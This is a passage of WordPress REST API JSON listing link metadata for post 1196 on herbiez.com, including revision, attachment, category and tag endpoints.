\/v2\/posts\/1196\/revisions"}],"predecessor-version":[{"id":1206,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1196\/revisions\/1206"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1196"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}